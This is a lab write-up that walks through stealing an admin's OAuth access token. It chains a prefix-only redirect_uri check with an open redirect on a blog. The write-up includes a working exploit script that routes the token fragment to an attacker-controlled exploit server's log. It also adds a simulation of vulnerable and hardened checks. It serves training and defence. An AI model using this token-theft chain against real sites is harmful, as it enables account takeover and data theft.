21.5 Lab: Stealing OAuth access tokens via an open redirect | 2024

This lab uses an OAuth service to allow users to log in with their social media accounts. Flawed validation by the OAuth service makes it possible for an attacker to leak access tokens to arbitrary pages on the client application. To solve the lab, identify an open redirect on the blog website and use this to steal an access token for the admin user’s account.

Karthikeyan Nagaraj
3 min read · May 16, 2024

Description

This lab uses an OAuth service to allow users to log in with their social media accounts. Flawed validation by the OAuth service makes it possible for an attacker to leak access tokens to arbitrary pages on the client application.

To solve the lab, identify an open redirect on the blog website and use this to steal an access token for the admin user’s account. Use the access token to obtain the admin’s API key and submit the solution using the button provided in the lab banner.

Note

You cannot access the admin’s API key by simply logging in to their account on the client application.

The admin user will open anything you send from the exploit server and they always have an active session with the OAuth service.

You can log in via your own social media account using the following credentials: wiener:peter.

Solution

  1. Turn on FoxyProxy in the browser and turn off Intercept in Burp.
  2. Log in via your social media account (wiener:peter), then log out. In Burp's HTTP history, find the GET /auth?client_id=[...] request to the OAuth server and note the client_id and the redirect_uri it sends (https://YOUR-LAB-ID.web-security-academy.net/oauth-callback).
  3. Two flaws are chained. The OAuth server only checks that redirect_uri begins with the registered callback, so a directory-traversal sequence appended to it (/oauth-callback/../post/next) passes validation but actually lands on the blog's "next post" endpoint. That endpoint, /post/next?path=..., is an open redirect: it forwards to whatever URL is in path, and browsers carry the URL fragment (where the implicit-flow access token is placed) across the redirect. Build an exploit that first sends the victim into this flow and then, when the page reloads with the token in the fragment, rewrites the fragment into a query string so it shows up in the exploit server's access log. Put the following script in the exploit server's body, replacing the placeholder values (the client_id comes from the GET /auth?client_id=[...] request in the HTTP history):
<script>
// First load: no fragment yet, so start the OAuth flow. The redirect_uri passes the
// prefix check but resolves to the blog's open redirect, which forwards to this page.
if (!document.location.hash) {
    window.location = 'https://oauth-YOUR-OAUTH-SERVER-ID.oauth-server.net/auth?client_id=YOUR-LAB-CLIENT-ID&redirect_uri=https://YOUR-LAB-ID.web-security-academy.net/oauth-callback/../post/next?path=https://YOUR-EXPLOIT-SERVER-ID.exploit-server.net/exploit/&response_type=token&nonce=399721827&scope=openid%20profile%20email'
} else {
    // Second load: the token arrived in the fragment, which the server never sees.
    // Move it into the query string so the request is written to the access log.
    window.location = '/?'+document.location.hash.substr(1)
}
</script>

  4. Store the exploit and click "View exploit". The page should appear to refresh, but if you check the access log, you should see a new request for GET /?access_token=[...].
  5. Deliver the exploit to the victim, then copy their access token from the access log.
  6. In the HTTP history, find the GET /me request, send it to Repeater, and replace the token in the Authorization: Bearer header with the one you just copied.
  7. Send the request. Observe that you have successfully made an API call to fetch the victim's data, including their API key.
  8. Use the "Submit solution" button at the top of the lab page to submit the stolen key and solve the lab.
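The chain above depends on three things: a redirect_uri check that is only a string-prefix comparison, an open redirect on the blog, and the browser carrying the URL fragment through a redirect. The following is an added example, not code from the lab or from the article, that models each link with a vulnerable and a hardened version and walks the victim's browser through the flow. The hostnames (client.example, exploit.example), the function names and the token value are placeholders chosen for this example; the path /post/next?path= and the /oauth-callback/../ traversal mirror the exploit URL above.

```javascript
// Placeholder origins for this example (not the lab's real hostnames).
const CLIENT_ORIGIN = 'https://client.example';
const REGISTERED_REDIRECT = 'https://client.example/oauth-callback';
const EXPLOIT_ORIGIN = 'https://exploit.example';

// 1. The flawed OAuth-server check: a plain prefix comparison. It accepts the
//    registered URI, but also anything that merely starts with it.
function redirectUriAllowedPrefix(uri) {
  return uri.startsWith(REGISTERED_REDIRECT);
}

// 2. A hardened check: parse, let the URL parser resolve '..' segments, then
//    require an exact origin + path match with no query or fragment.
//    '/oauth-callback/../post/next' normalises to '/post/next' and is rejected.
function redirectUriAllowedStrict(uri) {
  let parsed;
  try {
    parsed = new URL(uri);
  } catch {
    return false;
  }
  const registered = new URL(REGISTERED_REDIRECT);
  return parsed.origin === registered.origin &&
         parsed.pathname === registered.pathname &&
         parsed.search === '' &&
         parsed.hash === '';
}

// 3. The blog's /post/next?path=... handler. The open version redirects to
//    whatever 'path' says; the safe version only follows same-origin targets.
function nextPostRedirectOpen(path) {
  return path;
}
function nextPostRedirectSafe(path) {
  const target = new URL(path, CLIENT_ORIGIN); // resolves relative paths
  return target.origin === CLIENT_ORIGIN ? target.href : CLIENT_ORIGIN + '/';
}

// 4. Walk the implicit flow as the victim's browser would. The OAuth server
//    appends the token as a fragment; if the callback is the open redirect, the
//    browser follows it and keeps the fragment; the exploit page then copies
//    the fragment into the query string (the script's else-branch), which is
//    what reaches the exploit server's access log.
function simulateImplicitFlow(redirectUri, allowed, nextPostRedirect, token) {
  if (!allowed(redirectUri)) {
    return { leaked: false, reason: 'redirect_uri rejected' };
  }
  const callback = new URL(redirectUri);
  callback.hash = 'access_token=' + token;
  let finalUrl = callback.href;
  if (callback.pathname === '/post/next') {
    const dest = new URL(nextPostRedirect(callback.searchParams.get('path')));
    dest.hash = callback.hash; // fragments survive a 302 in browsers
    finalUrl = dest.href;
  }
  const landed = new URL(finalUrl);
  if (landed.origin !== EXPLOIT_ORIGIN) {
    return { leaked: false, reason: 'never left client' };
  }
  return { leaked: true, logged: '/?' + landed.hash.substr(1) };
}

// The attacker-controlled redirect_uri, shaped like the one in the exploit above.
const ATTACK_URI = CLIENT_ORIGIN + '/oauth-callback/../post/next?path=' +
                   EXPLOIT_ORIGIN + '/exploit/';

// Run the four combinations so each fix can be seen closing the hole on its own.
function runScenarios(token) {
  return {
    vulnerable: simulateImplicitFlow(ATTACK_URI, redirectUriAllowedPrefix, nextPostRedirectOpen, token),
    strictUri:  simulateImplicitFlow(ATTACK_URI, redirectUriAllowedStrict, nextPostRedirectOpen, token),
    safeRedir:  simulateImplicitFlow(ATTACK_URI, redirectUriAllowedPrefix, nextPostRedirectSafe, token),
    legit:      simulateImplicitFlow(REGISTERED_REDIRECT, redirectUriAllowedStrict, nextPostRedirectSafe, token),
  };
}

console.log(JSON.stringify(runScenarios('tok123'), null, 2));
```

Either fix alone stops the leak: exact matching of redirect_uri after normalisation is the one that belongs to the OAuth server, and refusing off-origin targets in /post/next is the one that belongs to the blog. Note that the hardened check still accepts the registered callback, so legitimate logins are unaffected.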


Karthikeyan Nagaraj

Security Researcher | Bug Hunter | Web Pentester | CTF Player | TryHackme Top 1% | AI Researcher | Blockchain Developer